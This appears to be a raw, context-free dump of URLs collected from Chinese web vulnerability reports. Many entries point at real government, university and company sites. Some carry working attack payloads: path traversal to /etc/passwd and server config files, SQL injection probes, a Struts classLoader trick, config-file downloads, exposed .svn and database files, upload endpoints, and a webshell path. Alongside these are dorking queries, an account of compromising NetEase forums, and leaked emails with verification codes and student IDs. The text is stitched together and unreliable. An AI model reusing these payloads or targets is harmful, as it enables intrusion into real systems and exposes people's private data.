https://mapi.alipay.com/gateway.do?_input_charset=utf-8¬ify_url=http%3A%2F%2Fpay.zymk.cn%2Fpaycenter%2Falipay%2Fnotify_url.php&out_trade_no=vip_0511235007_5094751&partner=2088201607928636&payment_type=1&paymethod=directPay&seller_email=mkcomic%40qq.com&service=create_direct_pay_by_user&subject=%E5%85%85%E5%80%BC%E6%BC%AB%E5%AE%A2%E6%A0%88%E5%8C%85%E6%9C%88vip&total_fee=100&sign=c343ef7c329034184b2c880969eae1d0&sign_type=MD5 http://www.bzldbz.gov.cn/ http://116.228.70.126 www2.91bcbang.com的网站,一个博彩导航网站,该导航网站有几十个博彩公司的广告。搜索162.212.180.231这个IP,得到这个IP的历史记录 http://xiao.zymk.cn/ http://xiao.zymk.cn/180789 http://zhichang.renren.com/company/5860961/positions http://zhichang.renren.com/home/resume http://zhichang.renren.com/follow?uid=8629369&_rtk=5393bf59 http://zhichang.renren.com/company/6899681?url_stat_type=search_company?url_stat_type=index_company http://zhichang.renren.com/follow?uid=6899681&_rtk=5393bf59 http://ecard.xidian.edu.cn/fabu/cardUserManager.do?method=thirdLogin&certNo= http://xjyjy.zqu.edu.cn/ http://221.179.43.190/x.asp http://ccidstudy.ccidnet.com/?mod=Bookshow&id=72 http://202.38.232.84/eresources/edetail.php?id=18 site:http://202.38.232.84/ inurl:login找出后台登陆网址 http://www.wzae.gov.cn/was/portals/main/news.jsp?unid=20131220-6156C1AFD8389AA8CC23-11 http://vip.book.sohu.com/user/data/bookshelf_data_mobile.php?f=1 http://sns.maimaicha.com/company/hebei?category=heicha_zcs http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini http://www.yzwh.gov.cn/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini http://111.175.243.111:8080/sig/ http://210.76.65.156/sofpro/sof_inneruser_login.jsp http://www.baiyunshan.com.cn/sofpro/otherproject/dcwj/dcwj.jsp?id=6 http://www.riyu365.com/ http://www.jsgygs.gov.cn:8000/login.action http://szjllc.hefei.gov.cn/admin/Login.asp http://zjjw.fimmu.com/bbs/boke/Edit_Plus/FCKeditor/editor/dialog/fck_select.html 
http://zjjw.fimmu.com/bbs/login.asp账号登陆 http://zjjw.fimmu.com/bbs/boke/Data/Dvboke.mdb http://202.195.176.29/gmis/login.aspx http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20112101&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20102101&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20122101&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20122102&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20122103&Action=view http://www.whxzjx.gov.cn/ http://61.153.10.88:8080/voip/ippbx/adminindex.jsp http://127.0.0.1/data/%23data.asp http://127.0.0.1/data/%23aspcms252.asp http://hzgxgh.hhtz.gov.cn/Admin/login.aspx http://68cn.dooland.com/brand_all.php?pid=1 http://68cn.dooland.com//subscription_all.php?sortid=1 http://202.205.10.73/softwarer/course/course.asp?Code=00017 http://210.74.129.75/RegisterNewAccount.aspx Url:http://210.74.129.75//UserControls/AppendixEditor/Image.aspx?id=559576fd-bc63-41a0-a3ca-147a68a43475 http://zhuokearts.com/ http://home.xdf.cn http://asp.19e.cn/homepage.action http://www.shouliwang.com/travel http://member.9978.cn/favorite/del_info/id/1404 http://member.9978.cn/favorite/del_info/id/1404 http://985ap.xjtu.edu.cn/viewlist.php?id=traindetail&pid=2 http://985ap.xjtu.edu.cn/viewlist.php?id=traindetail&pid=2 http://985ap.xjtu.edu.cn/viewdetail.php?id=632 http://cms.neotv.cn/ http://www.neotv.cn/ http://wooyun.org/bugs/wooyun-2013-044084进行getshell操作 https://api.weibo.com/oauth2/authorize?client_id=2892344974&redirect_uri=http%3A%2F%2Fwww.mafengwo.cn%2Fconnect_sync%2Fsina_v2_sync.php&response_type=code http://www.mafengwo.cn/connect_sync/sina_v2_sync.php?code=6e20eb6bfea2d969a8fa5435a5d106d5 http://sylar.co/ encap:Ethernet B8:CA:3A:EB:C0:5A addr:211.100.37.152 Bcast:211.100.37.255 Mask:255.255.255.0 MTU:1500 packets:290695541 dropped:22171512 packets:130743076 txqueuelen:1000 http://www.gaohang.gov.cn/的站内搜索处 
http://www.gaohang.gov.cn/index.php?id=1174 http://dbshare.cintcm.com/zhongyaojichu/left2.asp?init=0 http://dbmanager.cintcm.ac.cn/co/account/login.action http://www.infojiading.cn/index.asp http://210.***.***.46/conformID.asp?Tid=123%27 http://jiuye.***.edu.cn/conformID.asp?Tid=123%27 http://jytd.***.edu.cn/job/conformID.asp?Tid=123 http://job.tuniu.com/society/jobInfo/getJobInfoById?id=239 http://yb.cuit.edu.cn/editor/db/ewebeditor.mdb https://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=sSjGGXfnrH06sF7TbOVOuVRV&redirect_uri=http://open.baihe.com/connector/t/baiduInternalBindCallBack.action http://open.baihe.com/connector/t/baiduInternalBindCallBack.action?code=ae3197a3a5b36e219c5362f763aeaf39 http://www.998.com/ServiceComment/NewsCommentDetail.aspx?Act=GetNewsComment&CurrentPageSize=10&PageSize=10&CurrentPage=1&NewsID=7701 http://nbsw.yundasys.com:11324/ztb/register.php http://shixin.court.gov.cn/于是来到这个查询页面 http://www.zju-jsemba.com/newsread.asp?id=230 http://www.sisins.zju.edu.cn/sh/newsshow.asp?id=914 http://www.cec.zju.edu.cn/reod/english/xzfc_show.asp?id=7004 http://www.cfpg-zju.com/news.asp?id=352 http://www.ceu.zju.edu.cn/itpeceu/itpe_cn/allxx_news.asp?ID=410 http://www.reod.zju.edu.cn/xzfc_show.asp?id=7020 http://jpck.zju.edu.cn/seeco/news.asp?id=318 http://ipe.zju.edu.cn/about.asp?id=133 http://www.zjusz.com/article.asp?id=116 http://www.zhjzg.com/news.asp?newsid=290 http://www.zhjzg.com/ship.asp?id=1 http://800019376.114.qq.com/ndetail_867.html pxcz.gov.cn/page/ http://ketang.weibo.com/ http://mail.yto.net.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 index.php/script/help_proxy android:label="@7F05003C android:name="com.qvod.kuaiwan.kwbrowser.DownloadListActivity android:launchMode="3 android:screenOrientation="5 android:name="com.qvod.kuaiwan.kwbrowser.DownloadListActivity 
http://www.game69.cn:888/tools/filesupload.aspx http://www.ga163.com/qyry.asp?CoolSiteClassID=40 http://www.gakfq.gov.cn/admin/upload_pic.asp?formname=myform&editname=C_SitePicS&uppath=../admin&filelx=jpg http://www.hyszx.gov.cn/admin/upload_pic.asp?formname=myform&editname=C_SitePicS&uppath=../admin&filelx=jpg http://www.ga163.com/admin/upload_pic.asp?formname=myform&editname=C_SitePicS&uppath=../admin&filelx=jpg http://www.sdau.edu.cn/yjs/v2.0/lanmu.php?lid=27 http://hfzx.yxnu.net/lanmu.php?lid=15 http://www.jump-sys.com/lanmu.php?lid=50 http://hq.sspu.edu.cn/userInit.action http://localhost/thinksaas/index.php?app=system&ac=sql&ts=delete&sql=../../CHANGELOG.TXT http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add http://10.65.203.100:90/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add http://10.65.203.100:90//Templates/cn2014/html/111111.asp;111111.html http://www1.openedu.com.cn/file_post/display/read.php?FileID=28264 http://www.daysunlogistics.com.cn/data/myflynt/download.php?filename=../../../data/myflynt/download.php http://office.sz.focus.cn/rentsale/rentsale_view.php?rent_id=583531 inurl:rent_id http://www.kaixin001.com/reg/reg_verify.php?verifycode=354619639711&email=yangxin1012%40126.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=786245668830&email=liyizhou389%40sohu.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=265774717699&email=123456789chengnuo%40163.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=200449361669&email=tuofu410%40sina.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=418260550882&email=1013930348%40qq.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=825294304236&email=abc005.blogger%40blogger.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=326673318916&email=wpr72123%40sohu.com 
http://www.kaixin001.com/reg/reg_verify.php?verifycode=844649902763&email=yeyanhaoyou%40163.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=785733632577&email=zhongshaoxi%40qq.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=886374179665&email=gicy1988%40eyou.com http://220.181.74.176:8080/ http://220.181.74.176:8080/message.jsp tel:10010 http://133.52.**.*/tel.htm tel:telnumer之前都会提示用户是否拨打或者只跳转到拨号页面。 http://123.7.53.81:7001/console http://www.lytlgjj.com/gjj/ http://www.edongeejiao.cn/,直接上传下载任意内容 http://www.infojiading.cn) http://job.shvtc.com:85/EntInfoget.asp?UENo=12 http://10.65.10.235/6kbbs/member.php?action=details jsp:useBean http://www.rxczj.gov.cn/news/news.php?id=4364&cid=23 http://dyb.zjitc.net/index.php?m=Index&a=category&id=6 http://lxj.ecare365.com/HelpDetail.php?id=60000138 www.4007001717.com.cn http://grsmis.sjzu.edu.cn/public/tutorshow.aspx?ID=00147&spec=6 http://202.118.83.94:85/public/tutorshow.aspx?ID=19851006&spec=59 http://202.199.155.6/dlugdmis/public/tutorshow.aspx?ID=040040&spec=6 http://service.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002 http://servicehome.yonyou.com/ http://servicehome.yonyou.com/kmview.aspx?postid=16584 http://xsst.sinaapp.com/Xss.swf http://mall.play.yy.com/shell/.svn/entries http://fujin.gov.cn/ http://zk.hfut.edu.cn/admin/show.php?id=511 http://gfzby.hfut.edu.cn/show.php?id=335 http://www.yclynk.gov.cn/scenic_show.asp?id=11存在SQL盲注漏洞 http://www.yclynk.gov.cn/lynkadmin/ http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://localhost/easytalk/?m=friends&a=addfollow&user_id=11&rand=2105 http://www.smartoa.com.cn/ http://www.ccblxn.com/file/EmailDownload.ashx?url=~/web.config&name=web.config http://vip.hn118114.cn/localLifeXq.aspx?Id=5 http://vip.hn118114.cn/localLifeXq.aspx?Id=5 http://www.sqlmap.org Url:http://taokebao.v5shop.com.cn/cart.aspx?act=spikebuy&spikeid=3 inurl:productpic.aspx,因为cart.aspx是需要登录才可以正常访问,但是注入的时候毫无影响。 
http://shop.optoma.com.cn/cart.aspx?act=spikebuy&spikeid=3 http://www.eglip.com/cart.aspx?act=spikebuy&spikeid=3 http://ilikeulike.cn/cart.aspx?act=spikebuy&spikeid=3 http://www.hjqtc.com/cart.aspx?act=spikebuy&spikeid=3 http://www.cs929.com/cart.aspx?act=spikebuy&spikeid=3 http://www.xiaokang.com/cart.aspx?act=spikebuy&spikeid=3 http://www.yinbaojie.com/cart.aspx?act=spikebuy&spikeid=3 http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 http://www.echinasport.com/cart.aspx?act=spikebuy&spikeid=3 http://www.biz-nbculture.com/cart.aspx?act=spikebuy&spikeid=3 http://haowan.lenovo.com/uc_server/ http://haowan.lenovo.com http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1,受影响参数:proid http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews https://sec.xiaomi.com/#/issue/416 http://www.kkeye.com/bbacad/downerro.aspx?p=2&jkname=&jkurl= http://www.kkeye.com/bbacad/downerro.aspx?jkname=&jkurl= http://sqlmap.org http://appblog.cxt8.com/agagakj/Comment/CommentAdd?parentid=0&pindex=1&content=123456&commenttype=101&is_desc=true&keyid=1&callback=jQuery16208815743161222577_1400028543820&_=1400028988970 http://appblog.cxt8.com/agagakj/Comment/CommentAdd?parentid=…ack=jQuery16208815743161222577_1400028543820&_=1400028988970 http://appblog.cxt8.com/agagakj/Comment/CommentAdd?parentid=…ack=jQuery16208815743161222577_1400028543820&_=1400028988970 http://ttt.nie.netease.com/convert/论坛转换工具存在漏洞,所以拿下了此站的shell,虽然被你们发现,删了shell,但是之前就dump了http://dc.nie.netease.com的管理员帐号,进后台,又把http://dc.nie.netease.com拿下,通过获取的管理帐号,发现他还是好几个网易论坛的管理员,接着去http://sdk.itown.netease.com登录,拿下了此站,发现此服务器上有许多网易游戏论坛,全部搞定。 http://cc.netease.com http://jl.netease.com http://mgame.netease.com http://popogame.netease.com http://wh.netease.com http://xy3.netease.com http://y3.netease.com http://zd.netease.com http://zh.netease.com http://xyq.netease.com 
http://cose-sz.seu.edu.cn/ http://new.fjite.gov.cn:8888/help/index.php?id=34 http://new.fjite.gov.cn:8888/help/index.php?id=34 http://www.sqlmap.org https://124.119.22.83:8080/ http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com http://hdcb.cn:80/web/faq.aspx?tag=faq&ptag=khfw http://www.anzhi.com/上下载个APP,顺便帮他检查一下。 http://ttkd.21tb.com/login/login.logout.do http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 
http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com http://www.ardjse.com/news_view.asp?news_id=132 http://218.66.59.52:8080/showfilepage.do?ID=26 http://weibo.com/1898506183/B49HFrvVx https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog http://www.kkapp.com/details_913536.html http://www.yunyin.com/ics/case/client.cfm http://www.rymusic.com.cn/main/(人民音乐出版社) http://www.aibang.com/?area=bizpay&cmd=card&id= http://202.108.65.139:8080/ http://202.108.65.139:8080/page.jsp?type=2&id=300 http://120.192.117.227/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=%CC%A9%B7%BF%C8%A8%D6%A4%CC%A9%D7%D6%B5%DA249581%BA%C5 
http://www.xyfg.gov.cn//bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=%CC%A9%B7%BF%C8%A8%D6%A4%CC%A9%D7%D6%B5%DA249581%BA%C5 http://222.132.190.46/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=%CC%A9%B7%BF%C8%A8%D6%A4%CC%A9%D7%D6%B5%DA249581%BA%C5 http://huodong.renren.com/inc/n2/.svn/entries http://comix.renren.com/inc/n2/.svn/entries http://cxpt.gzcc.gov.cn:8001/cxpj_gz/toLogin.action http://taokebao.v5portal.com/productask.aspx?id=1 http://anyltics.ccidnet.com/ http://stat.ccidnet.com/ http://wooyun.org/bugs/wooyun-2012-09977 http://stat.ccidnet.com/register.php http://stat.ccidnet.com/manage_user.php) http://stat.ccidnet.com/manage_user.php?action=edituser&managerid=wooyun&type=wooyun http://www.yunyin.com/ics/case/client.cfm http://www.rymusic.com.cn/main/(人民音乐出版社) http://cq.189.cn/mall/order/detail?acceptId=EMA201308022131044147 http://cq.189.cn/mall/order/detail?acceptId=EMA201312261749238834 http://www.cq.189.cn/mall/order/detail?acceptId=EMA201402281440020936 http://lol.uuu9.com/lolgl/adminlolgl/LOLManager.aspx http://marx.ustb.edu.cn/NewsDetail.aspx?id=451&dict_id=451 http://cauef.cau.edu.cn/read_article.jsp?col=23&id=1362 http://www.cupljob.net/cn/detail.php?id=13953 http://www.sqzwfw.gov.cn/news/newsDetailAction!query.shtml;jsessionid=wKgTZgBQUwnN3pipWuMmjko_h_v1EckGNX8A?infoid=2073&infotype=InfoZCFG http://www.ahzw.gov.cn/news/newsDetailAction!query.shtml?infoid=13334 http://www.czzw.gov.cn/news/newsDetailAction!query.shtml;jsessionid=06DB312DF2D4B1A5B6E3A8C01F8C9479?infoid=1449&infotype=InfoZHXW http://www.sxxzfw.gov.cn/news/newsDetailAction!query.shtml;jsessionid=43A9D749D42A321287AC2AF79D87CB90?infoid=999&infotype=InfoZXJB inurl:jsessionid http://saas.56app.com/kuaidi/query.shtml;jsessionid=D867DE1075FFB604AD8D3232F2C5DA01 http://houqin.buct.edu.cn/picnewsread.asp?id=01573 http://open.17wo.cn/admin/ http://www.dangshi.cnki.net:8080/Nwkc/front/homehomeAction.action http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=266 http://join.yundasys.com/.svn/entries 
http://oos.yundasys.com/.svn/entries http://ioa.yundasys.com/.svn/entries http://mail.haier.com/ http://www.diyou.cc/?plugins&q=areas&area_id=174 http://www.diyou.cc/?plugins&q=areas&area_id=174 www.diyou.cc https://cas.dgut.cn http://www.tiantian.com/products/search/index?Ajax_CallBack=true post:Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397 http://pfp.sina.net/public/actPriceQuery.php?which=res&resid=100&tm=1400117554535,参数resid过滤了单引号,加上%df%27触发宽字符漏洞,报错: http://pfp.sina.net/agent/login.php http://vips100.sina.net/ http://vips100.sina.net/styling/common.css/1.php,成功解析 http://home.focus.cn/ http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://www.tuniu.com/guide/interface/searchsolr/index?tpl=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 http://www.tuniu.com/guide/interface/searchsolr/index?tpl=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2ffd%2f2%00.php http://econ.ruc.edu.cn/displaynews.php?id=11647 http://law.bjtu.edu.cn/detail.asp?id=355&mtype=1&num=2 https://www.gzekt.com/DetailAction_findDetailById.action?orderform.orderid=20140512100020000021 https://www.gzekt.com/DetailAction_findDetailById.action?orderform.orderid=20140413100020000023 https://www.gzekt.com/DetailAction_findDetailById.action?orderform.orderid=20140420100020000002 https://www.gzekt.com/BussiAction_applicationCenter.action?business.busicode=100009 http://202.116.0.173/ http://rsj.huiyang.gov.cn/zn.asp?classid=6502 http://rsj.huiyang.gov.cn/more.asp?classid=6503 http://rsj.huiyang.gov.cn/display.asp?articleid=75073 http://115.182.21.54/ http://m.17wo.cn/smc http://art.jlu.edu.cn/info_edit.php?id=1266 
http://u.163.com/t/AAA http://u.163.com/t/BBB http://u.163.com/t/CCC http://web.jlnu.edu.cn/rsc/class/new2.php?id=573 http://211.87.224.132/install/ http://www.6660201.com/hkhy_content.asp?ID=5注入连接 http://www.aili.com.cn/aili.rar http://115.29.240.166/ http://www.bacic5i5j.com/culture/corenews/?type=2&newstype=21 http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://automation.sjtu.edu.cn/wwwroot.rar http://www.lijiang-airport.com/bbs/print.asp?id=3743 http://www.lijiang-airport.com/bbs/ljbbsdb/bbsxp.mdb http://bbs.siteserver.cn/thread-8-441286.aspx http://www.gzekt.com/password_find211.jsp?custname=16035329 http://job.tuniu.com/center/center/resume http://ebooking.airchina.com.cn/AMRWeb/shopping/search/showSearchPage_amrshop.action?class.classLoader.resources.dirContext.docBase=../ http://pmath.jlu.edu.cn/answersystem/question/admin/login.asp http://x.oupeng.com/download/download_action.php?action=search&word=2 http://www.xinhaisoft.com/ http://www.xinhaisoft.com/CustomerList.aspx http://www.xinhaisoft.com http://www.xxx.com/xxx/admin/fileopen.asp?filename=../index.asp http://www.xxx.com/admin/fileopen.asp?filename=../index.asp http://vci.jlu.edu.cn/yxcy.aspx?id=13 http://auto.jlu.edu.cn/editor/admin_login.asp http://www.easybonuscard.com:8888/auth/signon.jsp http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 
http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com jsp:directive.page jsp:directive.page http://1.acfun.tv http://r1.acfun.tv http://blog.acfun.tv http://cp.acfun.tv http://dts.acfun.tv http://h.acfun.tv http://hengyang.acfun.tv http://hzw.acfun.tv http://ios.acfun.tv http://jfz.acfun.tv http://jj.acfun.tv http://js.acfun.tv http://live.acfun.tv http://mc.acfun.tv http://static.acfun.tv http://taiyuan.acfun.tv http://trend.acfun.tv http://tu.acfun.tv http://wap.acfun.tv http://wenzhou.acfun.tv http://wg.acfun.tv http://wiki.acfun.tv http://www.acfun.tv http://wz.acfun.tv http://xyb.acfun.tv http://www.szhtkj.com.cn/ http://www.szhtkj.com.cn/onews.asp?id=331 http://www.szhtkj.com.cn/otype.asp?owen1=3 http://cw.fjcc.edu.cn/cw/ http://59.75.114.210/ http://202.113.66.33/web/content.aspx?lb=zc http://211.64.120.63/cw/content.aspx?lb=zc http://cw.fjcc.edu.cn/cw/wd.aspx?lb=zc http://59.75.114.210/wd.aspx?lb=zc http://cw.fjcc.edu.cn:80/cw/ http://wooyun.org/bugs/wooyun-2013-036870 http://www.4008266333.com/bkupload/ContentImg/icesword.aspx http://www.4008266333.com/wwww/web.config.bak http://www.4008266333.com/css/Weinberg%20Logistics.rar inurl:ACTIONSHOWNEWS inurl:ACTIONSHOWNEWS.APPPROCESS http://jw.bhcy.cn/index.jsp http://jwcweb.lnpu.edu.cn:7001/index.jsp http://www.vtcsy.com:8080/ACTIONSHOWFILES.APPPROCESS?mode=1&FolderID=62&size=15&page=3 
http://jw.bhcy.cn/index.jsp http://jw.bhcy.cn xx.com/JX/CjGL_jx08/ScoreReport/ScoreReportView.aspx?CellID= xx.com/JX/CjGL_jx08/ScoreReport/ScoreReportView.aspx?CellID=xx xx.com/JX/CjGL_jx08/ScoreReport/ScoreReportEdit.aspx?ScoreReportID= http://wkzx.hbu.edu.cn/Resourse.aspx?NTId=27 google:inurl:riseapprove_web/secondPage/deptProceedingDetailsx.do http://u8dev.yonyou.com http://u8dev.yonyou.com/default1.aspx http://www.yungoucms.cn做测试。 http://www.yungoucms.cn/?/admin做测试 http://www.foyoedu.com/) http://www.wzew.cn/cjcx/ http://www.ahczzx.cn:8000/cjcx/index.aspx http://www.syun.edu.sh.cn/cjcx/index1.asp http://www.kj.edu.sh.cn/cjcx/index1.asp http://exam.fdfz.cn/cjcx/index1.asp http://218.78.241.94/cjcx/index1.asp http://yyzx.ijd.cn/cjcx/index1.asp http://222.66.36.96/cjcx/ http://www.2fzszxy.fudan.edu.cn/cjcx/index1.asp学校信息化工作平台 http://218.78.241.94 http://wolife.17wo.cn www.xxx.com www.xxx.com http://www.xxx.com/account.php?act=delete&id=6 http://zm.17wo.cn https://192.168.0.249/直接到了登陆界面,百度之,才知道有PC版管理端和web管理端。 http://news.hnvs.cn/!team www.xmgwbn.com http://www.xmgwbn.com/job/main.php?id=36 http://www.xmgwbn.com/job/main.php?id=36 http://www.sqlmap.org www.xmgwbn.com\session http://www.yungoucms.cn做测试。 http://www.yungoucms.cn/help/1 http://www.yungoucms.cn/help/1* http://golf.ifeng.com/e/extend/ask/AskResult.php http://shsj.caep.ac.cn/zxzc/person.asp?meetingid=4 http://shsj.caep.ac.cn/zxzc/person.asp?meetingid=4&attenderid=4332 http://point.gzgwbn.net.cn/fckeditor/editor/filemanager/connectors/test.html http://point.gzgwbn.net.cn/UploadFiles/file/asp.asp/111.jpg http://point.gzgwbn.net.cn/newsinfo.aspx?nid=83 http://point.gzgwbn.net.cn/newsinfo.aspx?nid=83 http://www.sqlmap.org http://kp.xf.cn/ http://localhost/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute 
http://www.qada.gov.cn/admin/login.asp,会被不法分子扫描,进行破坏 http://itfax.cttzj.com/Index07_1.asp?ID=29 http://itfax.cttzj.com/scripts/ http://itfax.cttzj.com/aspnet_client/ http://itfax.cttzj.com/admin http://www.gwbn.cq.cn/service.asp?articleid=628&type=new http://www.gwbn.cq.cn/service.asp?articleid=628&type=new http://www.sqlmap.org www.gwbn.cq.cn\session http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://vshare.wo.com.cn/ http://vshare.wo.com.cn/album_list?key=1 http://vshare.wo.com.cn/album_list?key=1 http://vshare.wo.com.cn/album_list?key=1% http://xzrsksw.lxsk.com/article/ShowArticleList.aspx?AType=xwdt http://xzrsksw.lxsk.com/Login.aspx用户登录存在post注入 http://123.131.133.150:8080/wcm/ http://61.153.63.94/wcm http://www.cflac.org.cn/wcm http://wcm.xxz.gov.cn:8080/wcm/ http://www.jscnt.gov.cn/wcm/ http://www.sccnt.gov.cn http://218.94.123.203/wcm http://203.86.89.25/wcm/ http://www.lfcgs.gov.cn:8080/wcm/ http://iwr.cass.cn/wcm/ http://www.whxinzhou.gov.cn:9090/wcm/ http://123.131.133.150:8080/wcm/ http://122.224.174.82:8090/wcm/ http://www.qhepb.gov.cn http://211.154.254.113:8080/wcm/ http://app.yonyou.com/office/ http://academy.yonyou.com/default3.aspx http://wooyun.org/bugs/wooyun-2014-059478 http://www.dascomsoft.com/)开发的高校数字化学习中心系统存在自定义页面等多处上传漏洞,由于很多学校使用该系统,影响非常大。 http://www.dascomsoft.com/website/cases.aspx列出了300所高校使用该系统。 http://27.22.85.54:18080/suite/images/ 